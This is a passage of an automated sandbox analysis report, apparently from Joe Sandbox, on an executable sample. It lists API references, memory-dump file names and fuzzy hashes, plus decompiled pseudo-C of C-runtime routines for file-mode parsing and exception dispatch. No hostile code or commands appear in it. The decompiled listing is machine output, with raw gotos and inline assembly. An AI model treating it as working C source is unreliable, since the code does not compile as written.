                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC9A73,?,?,00000000,00007FF6E5AC9D0E,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5ACA8D7
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6E5AC9A73,?,?,00000000,00007FF6E5AC9D0E,?,?,?,?,?,00007FF6E5AC21EC), ref: 00007FF6E5ACA8E8
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 123f20f56d522984d698bd9dd84629da2798fda69247ae6c863cf6205230f879
                                                                                                                                                                                                                                                        • Instruction ID: 5c36fbb35e21fa347e14b01996224747ae4b1bc91ed643cfeae2c03369331369
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 123f20f56d522984d698bd9dd84629da2798fda69247ae6c863cf6205230f879
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27113D22F0C24242FB599B2E997237952815F55FA0F045334E93ECE6D6DF2EBC52870A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F), ref: 00007FF6E5ACA705
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F), ref: 00007FF6E5ACA724
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F), ref: 00007FF6E5ACA74C
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F), ref: 00007FF6E5ACA75D
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF6E5AD2433,?,?,?,00007FF6E5ACCB8C,?,?,00000000,00007FF6E5AC3A5F), ref: 00007FF6E5ACA76E
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 95480da4af507903146260a48c544ba2187903a84a128381655de0181cb330c2
                                                                                                                                                                                                                                                        • Instruction ID: 3fc3fc1d333c184a7cec52f75a1682cd9c0f89ec4eb912175886eac9671949bd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 95480da4af507903146260a48c544ba2187903a84a128381655de0181cb330c2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD110626F0820645FB69AA39483637A12925F55F70F045738D93ECE2D2DF2EBC51421B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ACF198(long long __rbx, signed int* __rcx, void* __rdx, long long __rdi, long long __rsi) {
                                                                                                                                                                                                                                                        				signed int _t31;
                                                                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                                                                        				signed int _t49;
                                                                                                                                                                                                                                                        				signed int _t56;
                                                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                                                                        				signed int _t89;
                                                                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                                                                                                                        				signed short* _t131;
                                                                                                                                                                                                                                                        				signed short* _t132;
                                                                                                                                                                                                                                                        				long long _t136;
                                                                                                                                                                                                                                                        				signed int _t138;
                                                                                                                                                                                                                                                        				signed short* _t142;
                                                                                                                                                                                                                                                        				signed short* _t143;
                                                                                                                                                                                                                                                        				void* _t144;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t109 = _t138;
                                                                                                                                                                                                                                                        				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t109 + 0x10)) = _t136;
                                                                                                                                                                                                                                                        				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				 *__rcx = _t109;
                                                                                                                                                                                                                                                        				__rcx[2] = 0;
                                                                                                                                                                                                                                                        				r14d = 0x20;
                                                                                                                                                                                                                                                        				_t31 =  *0xe5afc9ec; // 0x0
                                                                                                                                                                                                                                                        				__rcx[1] = _t31;
                                                                                                                                                                                                                                                        				goto 0xe5acf1db;
                                                                                                                                                                                                                                                        				_t142 = __rdx + 2;
                                                                                                                                                                                                                                                        				_t33 =  *_t142 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t33 == r14w) goto 0xe5acf1d3;
                                                                                                                                                                                                                                                        				if (_t33 == 0x61) goto 0xe5acf208;
                                                                                                                                                                                                                                                        				if (_t33 == 0x72) goto 0xe5acf1ff;
                                                                                                                                                                                                                                                        				if (_t33 != 0x77) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				 *__rcx = 0x301;
                                                                                                                                                                                                                                                        				goto 0xe5acf20e;
                                                                                                                                                                                                                                                        				__rcx[1] = 1;
                                                                                                                                                                                                                                                        				goto 0xe5acf215;
                                                                                                                                                                                                                                                        				 *__rcx = 0x109;
                                                                                                                                                                                                                                                        				__rcx[1] = 2;
                                                                                                                                                                                                                                                        				_t143 =  &(_t142[1]);
                                                                                                                                                                                                                                                        				r9b = bpl;
                                                                                                                                                                                                                                                        				dil = bpl;
                                                                                                                                                                                                                                                        				r10b = bpl;
                                                                                                                                                                                                                                                        				r11b = bpl;
                                                                                                                                                                                                                                                        				_t9 = _t136 + 0xa; // 0xa
                                                                                                                                                                                                                                                        				if ( *_t143 == 0) goto 0xe5acf37e;
                                                                                                                                                                                                                                                        				_t56 =  *_t143 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t83 = _t56 - 0x53;
                                                                                                                                                                                                                                                        				if (_t83 > 0) goto 0xe5acf2e8;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acf2d1;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acf369;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acf29f;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acf297;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acf285;
                                                                                                                                                                                                                                                        				_t61 = _t56 - r14d - 0xfffffffffffffff2 - _t9;
                                                                                                                                                                                                                                                        				if (_t83 == 0) goto 0xe5acf27c;
                                                                                                                                                                                                                                                        				if (_t61 != 4) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				if (r10b != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				 *__rcx =  *__rcx | 0x00000010;
                                                                                                                                                                                                                                                        				goto 0xe5acf2dd;
                                                                                                                                                                                                                                                        				asm("bts dword [ebx], 0x7");
                                                                                                                                                                                                                                                        				goto 0xe5acf367;
                                                                                                                                                                                                                                                        				if (( *__rcx & 0x00000040) != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				goto 0xe5acf365;
                                                                                                                                                                                                                                                        				r11b = 1;
                                                                                                                                                                                                                                                        				goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				if (dil != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				_t36 =  *__rcx;
                                                                                                                                                                                                                                                        				dil = 1;
                                                                                                                                                                                                                                                        				if ((_t36 & 0x00000002) != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				 *__rcx = _t36 & 0xfffffffe | 0x00000002;
                                                                                                                                                                                                                                                        				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                                                                                                                                                                                                                                                        				goto 0xe5acf369;
                                                                                                                                                                                                                                                        				_t89 = r10b;
                                                                                                                                                                                                                                                        				if (_t89 != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				 *__rcx =  *__rcx | r14d;
                                                                                                                                                                                                                                                        				r10b = 1;
                                                                                                                                                                                                                                                        				goto 0xe5acf369;
                                                                                                                                                                                                                                                        				if (_t89 == 0) goto 0xe5acf354;
                                                                                                                                                                                                                                                        				if (_t89 == 0) goto 0xe5acf345;
                                                                                                                                                                                                                                                        				if (_t89 == 0) goto 0xe5acf333;
                                                                                                                                                                                                                                                        				if (_t89 == 0) goto 0xe5acf327;
                                                                                                                                                                                                                                                        				if (_t89 == 0) goto 0xe5acf318;
                                                                                                                                                                                                                                                        				_t90 = _t61 - 0x34 - 4;
                                                                                                                                                                                                                                                        				if (_t90 != 0) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				asm("bt eax, 0x9");
                                                                                                                                                                                                                                                        				if (_t90 >= 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				asm("bts eax, 0xa");
                                                                                                                                                                                                                                                        				goto 0xe5acf365;
                                                                                                                                                                                                                                                        				if (( *__rcx & 0x0000c000) != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				asm("bts eax, 0xe");
                                                                                                                                                                                                                                                        				goto 0xe5acf365;
                                                                                                                                                                                                                                                        				if (r9b != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				asm("btr dword [ebx+0x4], 0xb");
                                                                                                                                                                                                                                                        				goto 0xe5acf33d;
                                                                                                                                                                                                                                                        				if (r9b != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				asm("bts dword [ebx+0x4], 0xb");
                                                                                                                                                                                                                                                        				r9b = 1;
                                                                                                                                                                                                                                                        				goto 0xe5acf369;
                                                                                                                                                                                                                                                        				_t94 =  *__rcx & 0x0000c000;
                                                                                                                                                                                                                                                        				if (_t94 != 0) goto 0xe5acf35c;
                                                                                                                                                                                                                                                        				asm("bts eax, 0xf");
                                                                                                                                                                                                                                                        				goto 0xe5acf365;
                                                                                                                                                                                                                                                        				asm("bt eax, 0xc");
                                                                                                                                                                                                                                                        				if (_t94 >= 0) goto 0xe5acf361;
                                                                                                                                                                                                                                                        				goto 0xe5acf369;
                                                                                                                                                                                                                                                        				asm("bts eax, 0xc");
                                                                                                                                                                                                                                                        				asm("dec eax");
                                                                                                                                                                                                                                                        				_t144 = _t143 + __rcx;
                                                                                                                                                                                                                                                        				if (1 != 0) goto 0xe5acf22c;
                                                                                                                                                                                                                                                        				_t128 =  ==  ? _t144 : _t144 + 2;
                                                                                                                                                                                                                                                        				goto 0xe5acf38f;
                                                                                                                                                                                                                                                        				_t129 = ( ==  ? _t144 : _t144 + 2) + 2;
                                                                                                                                                                                                                                                        				if ( *_t129 == r14w) goto 0xe5acf38b;
                                                                                                                                                                                                                                                        				if (r11b != 0) goto 0xe5acf3ac;
                                                                                                                                                                                                                                                        				if ( *_t129 != 0) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				__rcx[2] = 1;
                                                                                                                                                                                                                                                        				goto 0xe5acf47c;
                                                                                                                                                                                                                                                        				r8d = 3;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AC9A00(_t144) != 0) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				goto 0xe5acf3d3;
                                                                                                                                                                                                                                                        				_t131 = _t129 + 8;
                                                                                                                                                                                                                                                        				_t49 =  *_t131 & 0x0000ffff;
                                                                                                                                                                                                                                                        				if (_t49 == r14w) goto 0xe5acf3cf;
                                                                                                                                                                                                                                                        				if (_t49 != 0x3d) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				_t132 =  &(_t131[1]);
                                                                                                                                                                                                                                                        				if ( *_t132 == r14w) goto 0xe5acf3e6;
                                                                                                                                                                                                                                                        				r8d = 5;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD5474(_t109, _t132) != 0) goto 0xe5acf40f;
                                                                                                                                                                                                                                                        				asm("bts dword [ebx], 0x12");
                                                                                                                                                                                                                                                        				goto 0xe5acf451;
                                                                                                                                                                                                                                                        				r8d = 8;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD5474(_t109, _t132) != 0) goto 0xe5acf431;
                                                                                                                                                                                                                                                        				asm("bts dword [ebx], 0x11");
                                                                                                                                                                                                                                                        				goto 0xe5acf451;
                                                                                                                                                                                                                                                        				r8d = 7;
                                                                                                                                                                                                                                                        				if (E00007FF67FF6E5AD5474(_t109, _t132) != 0) goto 0xe5acf46c;
                                                                                                                                                                                                                                                        				asm("bts dword [ebx], 0x10");
                                                                                                                                                                                                                                                        				goto 0xe5acf45b;
                                                                                                                                                                                                                                                        				if (( *(_t132 + __rsi + 2) & 0x0000ffff) == r14w) goto 0xe5acf457;
                                                                                                                                                                                                                                                        				goto 0xe5acf39d;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t109);
                                                                                                                                                                                                                                                        				 *_t109 = 0x16;
                                                                                                                                                                                                                                                        				return E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                        0x7ff6e5acf198
                                                                                                                                                                                                                                                        0x7ff6e5acf19b
                                                                                                                                                                                                                                                        0x7ff6e5acf19f
                                                                                                                                                                                                                                                        0x7ff6e5acf1a3
                                                                                                                                                                                                                                                        0x7ff6e5acf1a7
                                                                                                                                                                                                                                                        0x7ff6e5acf1b6
                                                                                                                                                                                                                                                        0x7ff6e5acf1bc
                                                                                                                                                                                                                                                        0x7ff6e5acf1bf
                                                                                                                                                                                                                                                        0x7ff6e5acf1c5
                                                                                                                                                                                                                                                        0x7ff6e5acf1cb
                                                                                                                                                                                                                                                        0x7ff6e5acf1d1
                                                                                                                                                                                                                                                        0x7ff6e5acf1d3
                                                                                                                                                                                                                                                        0x7ff6e5acf1d7
                                                                                                                                                                                                                                                        0x7ff6e5acf1df
                                                                                                                                                                                                                                                        0x7ff6e5acf1e5
                                                                                                                                                                                                                                                        0x7ff6e5acf1eb
                                                                                                                                                                                                                                                        0x7ff6e5acf1f1
                                                                                                                                                                                                                                                        0x7ff6e5acf1f7
                                                                                                                                                                                                                                                        0x7ff6e5acf1fd
                                                                                                                                                                                                                                                        0x7ff6e5acf1ff
                                                                                                                                                                                                                                                        0x7ff6e5acf206
                                                                                                                                                                                                                                                        0x7ff6e5acf208
                                                                                                                                                                                                                                                        0x7ff6e5acf20e
                                                                                                                                                                                                                                                        0x7ff6e5acf215
                                                                                                                                                                                                                                                        0x7ff6e5acf21d
                                                                                                                                                                                                                                                        0x7ff6e5acf220
                                                                                                                                                                                                                                                        0x7ff6e5acf223
                                                                                                                                                                                                                                                        0x7ff6e5acf226
                                                                                                                                                                                                                                                        0x7ff6e5acf229
                                                                                                                                                                                                                                                        0x7ff6e5acf230
                                                                                                                                                                                                                                                        0x7ff6e5acf236
                                                                                                                                                                                                                                                        0x7ff6e5acf23a
                                                                                                                                                                                                                                                        0x7ff6e5acf23d
                                                                                                                                                                                                                                                        0x7ff6e5acf243
                                                                                                                                                                                                                                                        0x7ff6e5acf24c
                                                                                                                                                                                                                                                        0x7ff6e5acf255
                                                                                                                                                                                                                                                        0x7ff6e5acf25a
                                                                                                                                                                                                                                                        0x7ff6e5acf25f
                                                                                                                                                                                                                                                        0x7ff6e5acf261
                                                                                                                                                                                                                                                        0x7ff6e5acf263
                                                                                                                                                                                                                                                        0x7ff6e5acf268
                                                                                                                                                                                                                                                        0x7ff6e5acf271
                                                                                                                                                                                                                                                        0x7ff6e5acf277
                                                                                                                                                                                                                                                        0x7ff6e5acf27a
                                                                                                                                                                                                                                                        0x7ff6e5acf27c
                                                                                                                                                                                                                                                        0x7ff6e5acf280
                                                                                                                                                                                                                                                        0x7ff6e5acf289
                                                                                                                                                                                                                                                        0x7ff6e5acf292
                                                                                                                                                                                                                                                        0x7ff6e5acf297
                                                                                                                                                                                                                                                        0x7ff6e5acf29a
                                                                                                                                                                                                                                                        0x7ff6e5acf2a2
                                                                                                                                                                                                                                                        0x7ff6e5acf2a8
                                                                                                                                                                                                                                                        0x7ff6e5acf2aa
                                                                                                                                                                                                                                                        0x7ff6e5acf2af
                                                                                                                                                                                                                                                        0x7ff6e5acf2be
                                                                                                                                                                                                                                                        0x7ff6e5acf2c9
                                                                                                                                                                                                                                                        0x7ff6e5acf2cc
                                                                                                                                                                                                                                                        0x7ff6e5acf2d1
                                                                                                                                                                                                                                                        0x7ff6e5acf2d4
                                                                                                                                                                                                                                                        0x7ff6e5acf2da
                                                                                                                                                                                                                                                        0x7ff6e5acf2dd
                                                                                                                                                                                                                                                        0x7ff6e5acf2e3
                                                                                                                                                                                                                                                        0x7ff6e5acf2eb
                                                                                                                                                                                                                                                        0x7ff6e5acf2f0
                                                                                                                                                                                                                                                        0x7ff6e5acf2f5
                                                                                                                                                                                                                                                        0x7ff6e5acf2fa
                                                                                                                                                                                                                                                        0x7ff6e5acf2ff
                                                                                                                                                                                                                                                        0x7ff6e5acf301
                                                                                                                                                                                                                                                        0x7ff6e5acf304
                                                                                                                                                                                                                                                        0x7ff6e5acf30c
                                                                                                                                                                                                                                                        0x7ff6e5acf310
                                                                                                                                                                                                                                                        0x7ff6e5acf312
                                                                                                                                                                                                                                                        0x7ff6e5acf316
                                                                                                                                                                                                                                                        0x7ff6e5acf31f
                                                                                                                                                                                                                                                        0x7ff6e5acf321
                                                                                                                                                                                                                                                        0x7ff6e5acf325
                                                                                                                                                                                                                                                        0x7ff6e5acf32a
                                                                                                                                                                                                                                                        0x7ff6e5acf32c
                                                                                                                                                                                                                                                        0x7ff6e5acf331
                                                                                                                                                                                                                                                        0x7ff6e5acf336
                                                                                                                                                                                                                                                        0x7ff6e5acf338
                                                                                                                                                                                                                                                        0x7ff6e5acf33d
                                                                                                                                                                                                                                                        0x7ff6e5acf343
                                                                                                                                                                                                                                                        0x7ff6e5acf347
                                                                                                                                                                                                                                                        0x7ff6e5acf34c
                                                                                                                                                                                                                                                        0x7ff6e5acf34e
                                                                                                                                                                                                                                                        0x7ff6e5acf352
                                                                                                                                                                                                                                                        0x7ff6e5acf356
                                                                                                                                                                                                                                                        0x7ff6e5acf35a
                                                                                                                                                                                                                                                        0x7ff6e5acf35f
                                                                                                                                                                                                                                                        0x7ff6e5acf361
                                                                                                                                                                                                                                                        0x7ff6e5acf36d
                                                                                                                                                                                                                                                        0x7ff6e5acf373
                                                                                                                                                                                                                                                        0x7ff6e5acf378
                                                                                                                                                                                                                                                        0x7ff6e5acf385
                                                                                                                                                                                                                                                        0x7ff6e5acf389
                                                                                                                                                                                                                                                        0x7ff6e5acf38b
                                                                                                                                                                                                                                                        0x7ff6e5acf393
                                                                                                                                                                                                                                                        0x7ff6e5acf398
                                                                                                                                                                                                                                                        0x7ff6e5acf39d
                                                                                                                                                                                                                                                        0x7ff6e5acf3a3
                                                                                                                                                                                                                                                        0x7ff6e5acf3a7
                                                                                                                                                                                                                                                        0x7ff6e5acf3ac
                                                                                                                                                                                                                                                        0x7ff6e5acf3c3
                                                                                                                                                                                                                                                        0x7ff6e5acf3cd
                                                                                                                                                                                                                                                        0x7ff6e5acf3cf
                                                                                                                                                                                                                                                        0x7ff6e5acf3d3
                                                                                                                                                                                                                                                        0x7ff6e5acf3da
                                                                                                                                                                                                                                                        0x7ff6e5acf3e0
                                                                                                                                                                                                                                                        0x7ff6e5acf3e6
                                                                                                                                                                                                                                                        0x7ff6e5acf3ee
                                                                                                                                                                                                                                                        0x7ff6e5acf3f0
                                                                                                                                                                                                                                                        0x7ff6e5acf407
                                                                                                                                                                                                                                                        0x7ff6e5acf409
                                                                                                                                                                                                                                                        0x7ff6e5acf40d
                                                                                                                                                                                                                                                        0x7ff6e5acf40f
                                                                                                                                                                                                                                                        0x7ff6e5acf426
                                                                                                                                                                                                                                                        0x7ff6e5acf428
                                                                                                                                                                                                                                                        0x7ff6e5acf42f
                                                                                                                                                                                                                                                        0x7ff6e5acf431
                                                                                                                                                                                                                                                        0x7ff6e5acf448
                                                                                                                                                                                                                                                        0x7ff6e5acf44a
                                                                                                                                                                                                                                                        0x7ff6e5acf455
                                                                                                                                                                                                                                                        0x7ff6e5acf462
                                                                                                                                                                                                                                                        0x7ff6e5acf467
                                                                                                                                                                                                                                                        0x7ff6e5acf46c
                                                                                                                                                                                                                                                        0x7ff6e5acf471
                                                                                                                                                                                                                                                        0x7ff6e5acf499

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        • Opcode ID: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                                                                                                                                                        • Instruction ID: 03b4185c1e653d909583188ee4d639ed0ff1f3b7e40caa60cc02eea0ae650ab7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e657aeb740c2ac826b77e83addb2cc82262a2e6e3b5be7210a8d66ad85871f1f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47819977F0820295FB649F2D862437826A0AF51F88F558032CA1ADF285DF3EED01960B
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5ABE108(long long __rbx, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9) {
                                                                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                        				void* _t56;
                                                                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t27 = _t45;
                                                                                                                                                                                                                                                        				 *((long long*)(_t27 + 0x20)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t27 + 0x18)) = __r8;
                                                                                                                                                                                                                                                        				 *((long long*)(_t27 + 0x10)) = __rdx;
                                                                                                                                                                                                                                                        				_t43 = _t27 - 0x3f;
                                                                                                                                                                                                                                                        				_t46 = _t45 - 0xc0;
                                                                                                                                                                                                                                                        				if ( *__rcx == 0x80000003) goto 0xe5abe1ac;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t27);
                                                                                                                                                                                                                                                        				r12d =  *((intOrPtr*)(_t43 + 0x6f));
                                                                                                                                                                                                                                                        				if ( *((long long*)(_t27 + 0x10)) == 0) goto 0xe5abe1c7;
                                                                                                                                                                                                                                                        				__imp__EncodePointer(_t59, _t56, _t54, _t52, _t36, _t39, _t42);
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABCD20(_t27);
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t27 + 0x10)) == _t27) goto 0xe5abe1c7;
                                                                                                                                                                                                                                                        				if ( *__rcx == 0xe0434f4d) goto 0xe5abe1c7;
                                                                                                                                                                                                                                                        				r13d =  *((intOrPtr*)(_t43 + 0x77));
                                                                                                                                                                                                                                                        				if ( *__rcx == 0xe0434352) goto 0xe5abe1cb;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t46 + 0x38)) = r12d;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 + 0x30)) =  *((intOrPtr*)(_t43 + 0x7f));
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t46 + 0x28)) = r13d;
                                                                                                                                                                                                                                                        				 *((long long*)(_t46 + 0x20)) =  *((intOrPtr*)(_t43 + 0x67));
                                                                                                                                                                                                                                                        				_t19 = E00007FF67FF6E5ABD1C8(__rcx,  *((intOrPtr*)(_t43 + 0x4f)), __r8, __r9);
                                                                                                                                                                                                                                                        				if (_t19 == 0) goto 0xe5abe1cb;
                                                                                                                                                                                                                                                        				return _t19;
                                                                                                                                                                                                                                                        			}















                                                                                                                                                                                                                                                        0x7ff6e5abe108
                                                                                                                                                                                                                                                        0x7ff6e5abe10b
                                                                                                                                                                                                                                                        0x7ff6e5abe10f
                                                                                                                                                                                                                                                        0x7ff6e5abe113
                                                                                                                                                                                                                                                        0x7ff6e5abe122
                                                                                                                                                                                                                                                        0x7ff6e5abe126
                                                                                                                                                                                                                                                        0x7ff6e5abe13c
                                                                                                                                                                                                                                                        0x7ff6e5abe13e
                                                                                                                                                                                                                                                        0x7ff6e5abe143
                                                                                                                                                                                                                                                        0x7ff6e5abe150
